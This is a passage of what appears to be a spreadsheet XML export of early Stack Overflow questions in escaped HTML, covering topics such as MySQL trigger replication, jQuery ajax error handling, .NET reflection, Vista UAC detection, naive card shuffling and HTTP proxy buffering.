    CreateObjectPtr pCreateObjectFunc = (CreateObjectPtr)pFunc2;
    (*pTest)();  //this successfully pops up a message box
    (*pCreateObjectFunc)();  //this tosses an EEFileLoadException
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For what it's worth, the Event Log reports the following:
.NET Runtime version 2.0.50727.143 - 
Fatal Execution Engine Error (79F97075) (80131506)&lt;/p&gt;
&lt;p&gt;Unfortunately, Microsoft has no information on that error.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL Trigger &amp; Stored Procedure Replication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok,I'm running a setup with a single master and a number of slaves. All writes go through the master and are replicated down to the slaves which are used strictly for reads. &lt;/p&gt;
&lt;p&gt;Now I have a stored procedure (not function) which is called by a trigger on an insert. According to the MySQL docs, for replication triggers log the call to the trigger while stored procedures actually log the result of the stored procedure. &lt;/p&gt;
&lt;p&gt;So my question is, when my trigger gets fired, will it replicate both the trigger and the results of the procedure that the trigger calls (resulting in the procedure effectively being run twice)? Or will it simply replicate the trigger have the slaves re-run the stored procedure on their own?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't add server to a moved workspace</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this workspace downloaded off the web and I try running it on a tomcat server from a fresh installation of Eclipse Ganymede. This particular project came with its own workspace. &lt;/p&gt;
&lt;p&gt;When I select Tomcat v6.0 I get a message &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Cannot create a server using the selected type&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Older tomcat versions are available, though. &lt;/p&gt;
&lt;p&gt;I guess I have to recreate some configuration setting. The question is which one? This seems to be some odd error as creating a new dynamic web project lets me configure tomcat for both of them&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Python GUI APIs Are Out There?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What Python GUI API's are out there and what are the advantages of any given API?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm not looking for a religious war here, I'm just wanting to get a good handle on all that is out there in terms of Python GUI APIs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Volume (Balance) Control for XP/Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a method for controlling the Balance of the Wave output that will work on both XP and Vista?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windsor Interceptors AOP &amp; Caching</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm considering using Castle Windsor's Interceptors to cache data for helping scale an asp.net site.&lt;/p&gt;
&lt;p&gt;Does anyone have any thoughts/experience with doing this?&lt;/p&gt;
&lt;p&gt;Minor clarification:
My intention was to use Windsor to intercept 'expensive' calls and delegate to MemCacheD or Velocity (or another distributed cache) for the caching itself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Infopath 2007 - Emailed forms not rendering correctly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have a form that uses infopath services via sharepoint, and after multiple attempts at attempting to fix a rendering problem (tables appear WAY too wide to be readable), I think I have found the problem : date controls.&lt;/p&gt;
&lt;p&gt;It seems date controls within Infopath 2007 screw with rendering somehow.  To test, I made  2 variations of a VERY simple form - one with a date control, one with a text control - and placed them inside a table.&lt;/p&gt;
&lt;p&gt;When emailed, the one with the date control rendered incorrectly.&lt;/p&gt;
&lt;p&gt;My question is - has anyone experienced this before?  If you have time, test it out.  I think it is a bug or something, but not exactly sure.&lt;/p&gt;
&lt;p&gt;I am using Infopath 2007, Sharepoint 2007, and Outlook 2007.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Updated Sept 19, 2008&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Yes, web form capability is checked.
Web compatible date controls?  I think so - everything looks perfect in the browser... only the email messes up.
and yes you are correct.  My mistake this is Sharepoint 2007.  I fixed it above.&lt;/p&gt;
&lt;p&gt;If anyone has the time, try it out - it's very frustrating to have to use text boxes for dates.  Especially with the 'talent' we have here. lol&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I read selected files from a remote Zip archive over HTTP using Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to read selected files, matching on the file name, from a remote zip archive using Python. I don't want to save the full zip to a temporary file (it's not that large, so I can handle everything in memory).&lt;/p&gt;
&lt;p&gt;I've already written the code and it works, and I'm answering this myself so I can search for it later. But since evidence suggests that I'm one of the dumber participants on Stackoverflow, I'm sure there's room for improvement.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to catch a WCF exception in Silverlight?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Silverlight 2 application that is consuming a WCF service.  As such, it uses asynchronous callbacks for all the calls to the methods of the service.  If the service is not running, or it crashes, or the network goes down, etc before or during one of these calls, an exception is generated as you would expect.  The problem is, I don't know how to catch this exception.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Because it is an asynchronous call, I can't wrap my begin call with a try/catch block and have it pick up an exception that happens after the program has moved on from that point.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Because the service proxy is automatically generated, I can't put a try/catch block on each and every generated function that calls EndInvoke (where the exception actually shows up).  These generated functions are also surrounded by External Code in the call stack, so there's nowhere else in the stack to put a try/catch either.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I can't put the try/catch in my callback functions, because the exception occurs before they would get called.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There is an Application_UnhandledException function in my App.xaml.cs, which captures all unhandled exceptions.  I could use this, but it seems like a messy way to do it.  I'd rather reserve this function for the truly unexpected errors (aka bugs) and not end up with code in this function for every circumstance I'd like to deal with in a specific way.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Am I missing an obvious solution?  Or am I stuck using Application_UnhandledException?&lt;/p&gt;
&lt;p&gt;[Edit]&lt;br /&gt;
As mentioned below, the Error property is exactly what I was looking for.  What is throwing me for a loop is that the fact that the exception is thrown and appears to be uncaught, yet execution is able to continue.  It triggers the Application_UnhandledException event and causes VS2008 to break execution, but continuing in the debugger allows execution to continue.  It's not really a problem, it just seems odd.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stateful Web Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a java/spring application, and i may need to incorporate a stateful web service call.
Any opinions if i should totally run away from a stateful services call, or it can be done and is enterprise ready?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DNS- Route DNS for subfolder to different server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;LEt's say I want to have a subfolder called-  &lt;a href="http://www.foo.com/news/" rel="nofollow"&gt;http://www.foo.com/news/&lt;/a&gt; but I actually want that news folder on a different server.  I realize it can be done easily with subdomains, but I was really hoping for the subfolder thing.&lt;/p&gt;
&lt;p&gt;Is it possible? How?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using JQuery with ASP.NET MVC Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have searched the forum, and google for this topic. Most of the articles are talking about using JSON to call the controller/action on the server and do ajax effect on the result.&lt;/p&gt;
&lt;p&gt;I am trying to use some very basic JQuery features, like the JQuery UI/Tabs, and JQuery UI/Block for a dialog window. I cannot get these simple samples to work in my MVC project.  Any ideas how I should modify these samples? I only need these basic feature now and I can go from here.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fetch one row per account id from list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with game scores, allowing multiple rows per account id: &lt;code&gt;scores (id, score, accountid)&lt;/code&gt;. I want a list of the top 10 scorer ids and their scores.&lt;/p&gt;
&lt;p&gt;Can you provide an sql statement to select the top 10 scores, but only one score per account id? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where is the best place to store user related data in asp.net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When a customer logs in to my site, I need to know their account id and their menu id.  This lets me know what data they can see on a page and what menu they get.  I don't want to have to read this data over and over.  Should I store this in a session variable or customize the membership user and membership provider to contain this information?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can this macro be converted to a function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While refactoring code and ridding myself of all those #defines that we're now taught to hate, I came across this beauty used to calculate the number of elements in a structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define STRUCTSIZE(s) (sizeof(s) / sizeof(*s))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Very useful as it is but can it be converted into an inline function or template?&lt;/p&gt;
&lt;p&gt;OK, ARRAYSIZE would be a better name but this is legacy code (no idea where it came from, it's at least 15 years old) so I pasted it 'as is'.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect whether Vista UAC is enabled?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need my application to behave differently depending on whether Vista UAC is enabled or not. How can my application detect the state of UAC on the user's computer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JQuery error option in $.ajax utility</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The documentation indicates that the error: option function will make available: XHR instance, a status message string (in this case always error) and an optional exception object returned from the XHR instance (Book: JQuery in Action)&lt;/p&gt;
&lt;p&gt;Using the following (in the $.ajax call) I was able to determine I had a "parsererror" and a "timeout" (since I added the timeout: option) error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error: function(request, error){}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What are other things you evaluate in the error option? do you include the optional exception object?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; one of the answers indicates all the return errors...learning more about what is of value (for debugging) in the XHR instance and exception object would be helpful&lt;/p&gt;
&lt;p&gt;This is a complete $.ajax call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$.ajax({
 type: "post",
 url: "http://myServer/cgi-bin/broker" ,
 dataType: "text",
 data: {
 '_service' : 'myService',
 '_program' : 'myProgram',
 'start' : start,
 'end' : end
 },
 beforeSend: function() {
  $("#loading").removeClass("hide");
 },
 timeout: 5000,
 error: function(request,error) {
  $("#loading").addClass("hide");
  if (error == "timeout") {
   $("#error").append("The request timed out, please resubmit");
  }
  else {
   $("#error").append("ERROR: " + error);
  }
  },
  success: function(request) {
   $("#loading").addClass("hide");
   var t = eval( "(" + request + ")" ) ;
  } // End success
}); // End ajax method
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for the input&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB.Net (or C#) 2008 Multi Threaded Import</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to build a multi-threaded text import  facility (generally CSV into SQL Server 2005) and would like to do this in VB.NET but I am not against C#.  I have VS 2008 trial and just dont know where to begin.  Can anyone point me in the direction of where I can look at and play with the source of a &lt;em&gt;VERY&lt;/em&gt; simple multi-threaded application for VS 2008?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I generate a list of function dependencies in MATLAB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In order to distribute a function I've written that depends on other functions I've written that have their own dependencies and so on without distributing every m-file I have ever written, I need to figure out what the full list of dependencies is for a given m-file. Is there a built-in/freely downloadable way to do this?&lt;/p&gt;
&lt;p&gt;Specifically I am interested in solutions for MATLAB 7.4.0 (R2007a), but if there is a different way to do it in older versions, by all means please add them here.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add FTP support to Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Eclipse PHP Development Tools.  What would be the easiest way to access a file or maybe create a remote project trough FTP and maybe SSH and SFTP?.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Perl, how do I create a hash whose keys come from a given array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have an array, and I know I'm going to be doing a lot of "Does the array contain X?" checks. The efficient way to do this is to turn that array into a hash, where the keys are the array's elements, and then you can just say &lt;pre&gt;if($hash{X}) { ... }&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;Is there an easy way to do this array-to-hash conversion? Ideally, it should be versatile enough to take an anonymous array and return an anonymous hash.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find Commit Charge programmatically?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the total &lt;a href="http://en.wikipedia.org/wiki/Commit_charge" rel="nofollow"&gt;commit charge&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a variable's linkage and storage specifier?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When someone talks about a variables storage class specifier, what are they talking about?&lt;br /&gt;
They also often talk about variable linkage in the same context, what is that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find a private field with Reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given this class&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Foo
{
    // Want to find _bar with reflection
    [SomeAttribute]
    private string _bar;
    public string BigBar
    {
        get { return this._bar; }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to find the private item _bar that I will mark with a attribute.  Is that possible?  &lt;/p&gt;
&lt;p&gt;I have done this with properties where I have looked for an attribute, but never a private member field.&lt;/p&gt;
&lt;p&gt;What are the binding flags that I need to set to get the private fields?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python reading Oracle path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my desktop I have written a small Pylons app that connects to Oracle.   I'm now trying to deploy it to my server which is running Win2k3 x64. (My desktop is 32-bit XP) The Oracle installation on the server is also 64-bit.&lt;/p&gt;
&lt;p&gt;I was getting errors about loading the OCI dll, so I installed the 32 bit client into &lt;code&gt;C:\oracle32&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If I add this to the &lt;code&gt;PATH&lt;/code&gt; environment variable, it works great.   But I also want to run the Pylons app as a service (&lt;a href="http://wiki.pylonshq.com/display/pylonscookbook/How+to+run+Pylons+as+a+Windows+service" rel="nofollow"&gt;using this recipe&lt;/a&gt;) and don't want to put this 32-bit library on the path for all other applications.  &lt;/p&gt;
&lt;p&gt;I tried using &lt;code&gt;sys.path.append("C:\\oracle32\\bin")&lt;/code&gt; but that doesn't seem to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex best practices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the feeling that is easy to find samples, tutorials and simple examples on Flex.&lt;br&gt;
It seems harder to find tips and good practices based on real-life projects.&lt;br&gt;
Any tips on how to :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How to write maintainable actionscript code&lt;/li&gt;
&lt;li&gt;How to ensure a clean separation of concern. Has anybody used an MVC framework such as cairngorm, puremvc or easymvc on a real Flex project ?&lt;/li&gt;
&lt;li&gt;How to fetch data from a server with blazeds/amfphp ?&lt;/li&gt;
&lt;li&gt;How to reduce latency for the end-user ?&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>OLEDBConnection.Open() generates 'Unspecified error'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that uploads an Excel .xls file to the file system, opens the file with an oledbconnection object using the .open() method on the object instance and then stores the data in a database.  The upload and writing of the file to the file system works fine but I get an error when trying to open the file on our production server &lt;strong&gt;only&lt;/strong&gt;.  The application works fine on two other servers (development and testing servers).&lt;/p&gt;
&lt;p&gt;The following code generates an 'Unspecified Error' in the Exception.Message.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quote:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        System.Data.OleDb.OleDbConnection x = new System.Data.OleDb.OleDbConnection(@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" + location + ";Extended Properties='Excel 8.0;HDR=Yes;IMEX=1'");
        try
        {
            x.Open();
        }
        catch (Exception exp)
        {
            string errorEmailBody = " OpenExcelSpreadSheet() in Utilities.cs.  " + exp.Message;
            Utilities.SendErrorEmail(errorEmailBody);
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;:End Quote&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The server's c:\\temp and c:\Documents and Settings\\aspnet\local settings\temp folder both give \aspnet full control.&lt;/p&gt;
&lt;p&gt;I believe that there is some kind of permissions issue but can't seem to find any difference between the permissions on the noted folders and the folder/directory where the Excel file is uploaded.  The same location is used to save the file and open it and the methods do work on my workstation and two web servers.  Windows 2000 SP4 servers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web Dev - Where to store state of a shopping-cart-like object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You're building a web application. You need to store the state for a &lt;em&gt;shopping cart like&lt;/em&gt; object during a user's session.&lt;/p&gt;
&lt;p&gt;Some notes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This is not exactly a shopping cart, but more like an itinerary that the user is building... but we'll use the word cart for now b/c ppl relate to it.&lt;/li&gt;
&lt;li&gt;You do not care about "abandoned" carts&lt;/li&gt;
&lt;li&gt;Once a cart is completed we will persist it to some server-side data store for later retrieval.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Where&lt;/strong&gt; do you store that stateful object? And &lt;strong&gt;how&lt;/strong&gt;?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;server (session, db, etc?)&lt;/li&gt;
&lt;li&gt;client (cookie key-vals, cookie JSON object, hidden form-field, etc?)&lt;/li&gt;
&lt;li&gt;other...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: It was suggested that I list the platform we're targeting - tho I'm not sure its totally necessary... but lets say the front-end is built w/ASP.NET MVC.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I create a Visual Studio macro to launch a specific project in the debugger?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My project has both client and server components in the same solution file.  I usually have the debugger set to start them together when debugging, but it's often the case where I start the server up outside of the debugger so I can start and stop the client as needed when working on client-side only stuff. (this is much faster). &lt;/p&gt;
&lt;p&gt;I'm trying to save myself the hassle of poking around in Solution Explorer to start individual projects and would rather just stick a button on the toolbar that calls a macro that starts the debugger for individual projects (while leaving "F5" type debugging alone to start up both processess). &lt;/p&gt;
&lt;p&gt;I tried recording, but that didn't really result in anything useful. &lt;/p&gt;
&lt;p&gt;So far all I've managed to do is to locate the project item in the solution explorer: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Dim projItem As UIHierarchyItem
 projItem = DTE.ToolWindows.SolutionExplorer.GetItem("SolutionName\ProjectFolder\ProjectName").Select(vsUISelectionType.vsUISelectionTypeSelect)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(This is based loosely on how the macro recorder tried to do it.  I'm not sure if navigating the UI object model is the correct approach, or if I should be looking at going through the Solution/Project object model instead). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Approach For Configuring Multiple .Net Applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a suite of interlinked .Net 3.5 applications. Some are web sites, some are web services, and some are windows applications. Each app currently has its own configuration file (app.config or web.config), and currently there are some duplicate keys across the config files (which at the moment are kept in sync manually) as multiple apps require the same config value. Also, this suite of applications is deployed across various envrionemnts (dev, test, live etc)&lt;/p&gt;
&lt;p&gt;What is the best approach to managing the configuration of these multiple apps from a single configuration source, so configuration values can be shared between multiple apps if required? We would also like to have separate configs for each environment (so when deploying you don't have to manually change certain config values that are environment specific such as conenction strings), but at the same time don't want to maintain multiple large config files (one for each environment) as keeping this in sync when adding new config keys will prove troublesome.&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
&lt;p&gt;Robin&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing post data from one java servlet to another</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a servlet that will send a XML file (xml formatted string) to another servlet via a POST.
(Non essential xml generating code replaced with "Hello there")&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   StringBuilder sb=  new StringBuilder();
    sb.append("Hello there");
    URL url = new URL("theservlet's URL");
    HttpURLConnection connection = (HttpURLConnection)url.openConnection();                
    connection.setRequestMethod("POST");
    connection.setRequestProperty("Content-Length", "" + sb.length());
    OutputStreamWriter outputWriter = new OutputStreamWriter(connection.getOutputStream());
    outputWriter.write(sb.toString());
    outputWriter.flush();
    outputWriter.close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is causing a server error, and the second servlet is never invoked.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL server 2000 Like Statement Usage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL statement that looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT [Phone]
FROM [Table]
WHERE
(
    [Phone] LIKE '[A-Z][a-z]'
    OR [Phone] = 'N/A'
    OR [Phone] LIKE '[0]'
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The part I'm having trouble with is the where statement with the "LIKEs". I've seen SQL statements where authors used &lt;code&gt;like&lt;/code&gt; statements in the way I'm using them above. At first, I thought this might be a version of Regular Expressions but I've since learned. &lt;/p&gt;
&lt;p&gt;Is anyone familiar with using like statements in such a way. Note: the "N/A" is working fine. &lt;/p&gt;
&lt;p&gt;What I need to match is phone numbers that have characters. Or phone numbers which contain nothing but zero.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to read the value of a text input in a Flash SWF from a Flex App?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Flex application, which loads a SWF from CS3. The loaded SWF contains a text input called "myText". I can see this in the SWFLoader.content with no problems, but I don't know what type I should be treating it as in my Flex App. I thought the flex docs covered this but I can only find how to interact with another Flex SWF.&lt;/p&gt;
&lt;p&gt;The Flex debugger tells me it is of type fl.controls.TextInput, which makes sense. But FlexBuilder doesn't seem to know this class. While Flash and Flex both use AS3, Flex has a whole new library of GUI classes. I thought it also had all the Flash classes, but I can't  get it to know of ANY fl.*** packages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the most current, good practice, and easiest way to use sessions in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sessions in PHP seemed to have changed since the last time I used them, so I'm looking for a simple way of using sessions but at the same time for it to be relatively secure and a good common practice.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there anything wrong with returning default constructed values?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class some_class{};
some_class some_function()
{
    return some_class();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to work pretty well and saves me the trouble of having to declare a variable just to make a return value.  But I don't think I've ever seen this in any kind of tutorial or reference.  Is this a compiler-specific thing (visual C++)?  Or is this doing something wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tools To Help You Plan Projects / Features</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools do you use to plan a project or a large feature set? I currently use a mix of Word for writing specs and Photoshop for mockups, but is there something more suited for developers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I remove the .NET Compact Framework from my Windows Mobile 5 device?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get a number of third party applications to work on my Windows Mobile 5 smartphone.&lt;/p&gt;
&lt;p&gt;I've installed the latest version (3.5) of the Microsoft.NET Compact Framework, but whenever I run the apps I get an error message which states: "This application [Application Name] requires a newer version of the Microsoft .NET Compact Framework than the version installed on this device."&lt;/p&gt;
&lt;p&gt;Given I've supposedly successfully installed the latest version, this doesn't make sense, leading me to believe I need to remove the .NET Compact Framework and start again. (I've tried reinstalling it, but as far as I can tell there's no automated way of removing it on the device, or from my PC.)&lt;/p&gt;
&lt;p&gt;Does anyone have any suggestions as to what I need to do? Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is Visual Studio constantly crashing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Visual Studio randomly crashes when adding/removing references and projects.
Any thoughts why? Will installing Sp1 help?&lt;/p&gt;
&lt;p&gt;EDIT: I do not work with any addons except SourceSafe. I do most of my development in connected mode.&lt;br&gt;&lt;/p&gt;
&lt;p&gt;Developing using:&lt;br&gt;
    Visual Studio 2008 &lt;br&gt;
    WinXp Terminal Service -&gt; Win2k3 Sp2 (64bit)&lt;br&gt;
    VSS 8.0, 32bit&lt;br&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Real-world problems with naive shuffling</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a number of articles meant to teach beginning programming concepts through the use of poker-related topics. Currently, I'm working on the subject of shuffling.&lt;/p&gt;
&lt;p&gt;As &lt;a href="http://www.codinghorror.com/blog/archives/001015.html" rel="nofollow" title="The Danger of Naivete"&gt;Jeff Atwood points out on CodingHorror.com&lt;/a&gt;, one simple shuffling method (iterating through an array and swapping each card with a random card elsewhere in the array) creates an uneven distribution of permutations. In an actual application, I would just use the &lt;a href="http://en.wikipedia.org/wiki/Knuth_shuffle" rel="nofollow" title="Knuth Fisher-Yates shuffle"&gt;Knuth Fisher-Yates shuffle&lt;/a&gt; for more uniform randomness. But, I don't want to bog down an explanation of programming concepts with the much less coder-friendly algorithm.&lt;/p&gt;
&lt;p&gt;This leads to the question: Just how much of an advantage would a black-hat have if they knew you were using a naive shuffle of a 52-card deck? It seems like it would be infinitesimally small.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>std::map insert or std::map find?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assuming a map where you want to preserve existing entries. 20% of the time, the entry you are inserting is new data.  Is there an advantage to doing std::map::find then std::map::insert using that returned iterator?  Or is it quicker to attempt the insert and then act based on whether or not the iterator indicates the record was or was not inserted?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any HTTP proxies with explicit, configurable support for request/response buffering and delayed connections?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When dealing with mobile clients it is very common to have multisecond delays during the transmission of HTTP requests. If you are serving pages or services out of a prefork Apache the child processes will be tied up for seconds serving a single mobile client, even if your app server logic is done in 5ms. I am looking for a HTTP server, balancer or proxy server that supports the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;A request arrives to the proxy. The proxy starts buffering in RAM or in disk the request, including headers and POST/PUT bodies. The proxy DOES NOT open a connection to the backend server. This is probably the most important part.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The proxy server stops buffering the request when:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A size limit has been reached (say, 4KB), or&lt;/li&gt;
&lt;li&gt;The request has been received completely, headers and body&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Only now, with (part of) the request in memory, a connection is opened to the backend and the request is relayed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The backend sends back the response. Again the proxy server starts buffering it immediately (up to a more generous size, say 64KB.) &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Since the proxy has a big enough buffer the backend response is stored completely in the proxy server in a matter of miliseconds, and the backend process/thread is free to process more requests. The backend connection is immediately closed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The proxy sends back the response to the mobile client, as fast or as slow as it is capable of, without having a connection to the backend tying up resources.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I am fairly sure you can do 4-6 with Squid, and nginx appears to support 1-3 (and looks like fairly unique in this respect). My question is: is there any proxy server that empathizes these buffering and not-opening-connections-until-ready capabilities? Maybe there is just a bit of Apache config-fu that makes this buffering behaviour trivial? Any of them that it is not a dinosaur like Squid and that supports a lean single-process, asynchronous, event-based execution model?&lt;/p&gt;
&lt;p&gt;(Siderant: I would be using nginx but it doesn't support chunked POST bodies, making it useless for serving stuff to mobile clients. Yes cheap 50$ handsets love chunked POSTs... sigh)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I capture an asterisk on the form's KeyUp event? OR, How do I get a KeyChar on the KeyUp event?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to hijack an asterisk with the form's KeyUp event.  I can get the SHIFT key and the D8 key on the KeyUp event, but I can't get the * out of it.  I can find it easily in the KeyPress event (e.KeyChar = "*"c), but company standards say that we have to use the KeyUp event for all such occasions.  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Run macro automatically OnSave in Word</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a macro which refreshes all fields in a document (the equivalent of doing an &lt;kbd&gt;F9&lt;/kbd&gt; on the fields). I'd like to fire this macro automatically when the user saves the document.&lt;/p&gt;
